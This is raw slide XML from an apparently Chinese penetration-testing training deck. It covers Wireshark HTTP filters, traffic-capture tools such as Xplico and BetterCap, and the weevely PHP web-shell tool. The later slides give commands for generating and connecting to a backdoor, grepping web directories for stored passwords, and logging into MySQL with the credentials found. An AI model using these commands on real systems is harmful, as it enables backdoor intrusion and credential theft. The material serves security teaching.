              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a: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669924" y="4009924"/>
            <a:ext cx="10850564" cy="13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94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Wireshark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分析实例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3216" y="1467578"/>
            <a:ext cx="6096000" cy="43390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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.host==cohux.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.resonse.code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>==302</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>==1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>响应包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>==1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>请求报</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.request.method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>==POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>guid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zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤含有指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的数据包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.request.url==“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/login” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> contains “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤字符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.content_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>== “text/html” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>响应，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.response.phrase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == “ok“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>响应</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339995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Pacp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分析工具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51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69" y="1523584"/>
            <a:ext cx="3993226" cy="5913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269" y="2327146"/>
            <a:ext cx="4258429" cy="69184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62078" y="3231190"/>
            <a:ext cx="22300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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>输入用户名密码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xplico</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600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1650" b="23983"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="928609" y="3580865"/>
            <a:ext cx="8682116" cy="126982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62078" y="54014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Faial opt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Xplico</a:t>
            </a:r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和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>结合，分析流量 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BetterCap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08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weevely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用法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44252" y="1620632"/>
            <a:ext cx="7975948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－后门生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>连接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测试系统：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 2.0 amd64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环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>＋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>＋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>环境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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>工具版本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> v1.1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zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>下面分块来对参数或命令进行说明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后门生成（参数）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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:/home# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> generate password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>home/door.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>连</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>weevely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testurl/door.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> password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模拟测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US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Weevely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zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>技巧 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> . '^[^*/#]*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>passw?o?r?d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?'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查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mysql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zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382412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Weevely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技巧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14450" y="1356569"/>
            <a:ext cx="9010650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400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、查找包含其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户的文件夹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ls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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令查找其他用户存储在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>脚本中的密码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400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>grep . '^[^*/#]*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>passw?o?r?d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?‘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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、我们发现一些连接数据库的语句。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>‘mysql_conn’   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>递归查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>irn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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、我们可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql_console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>模块来连接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400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>www-data@target:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/www/members PHP&gt; :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql_console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rotozy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> rotozy123 -host 10.4.4.7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绕过策略读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
